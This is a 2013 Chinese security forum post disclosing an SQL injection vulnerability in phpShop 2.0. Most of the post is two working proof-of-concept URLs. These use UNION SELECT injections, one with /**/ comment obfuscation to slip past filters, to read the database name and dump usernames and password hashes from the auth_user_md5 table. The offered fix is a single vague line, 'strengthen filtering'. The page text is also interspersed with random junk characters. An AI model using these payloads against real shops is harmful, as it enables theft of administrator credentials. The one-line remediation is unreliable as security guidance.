找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1910|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability8 W. k+ i; C! H$ s5 |

, w) }$ {. k1 y2 D7 P% l0 N* C作者 : By onestree
1 W4 j8 J4 r# W: Y6 b' s3 x下载地址 : http://code.google.com/p/phpshop/downloads/list
1 e: r, Z+ r  y0 o; a测试地址: windows 7 / ubuntu5 F6 E2 h  J, w* G" n8 E8 n: J1 S

* J- ~* e' x2 n+ X( V9 x6 z
& k) ^$ u  U8 v1 k+ S& gSQLi p0c:0 j' x4 ^- Z8 A! Q, w$ I. Y

5 d  a( x# [4 y/ l; i) t, q==================
3 x) e5 k6 t4 E7 l$ v0 o + l# M" s7 q+ c0 E
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'( D3 [$ c0 l3 ~' H; v9 _* f
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
. P- q# d& m9 ]2 A% w
, w0 x2 {* u) dhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--0 `1 Z3 k( x! F4 X

/ C7 Z8 {, z% V7 R& l修复:
5 i) d. y. g: n; V/ X加强过滤; k  r7 X4 E6 @& Z
' B- z  z+ e1 M' {
$ e" L2 `6 W3 M; l4 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表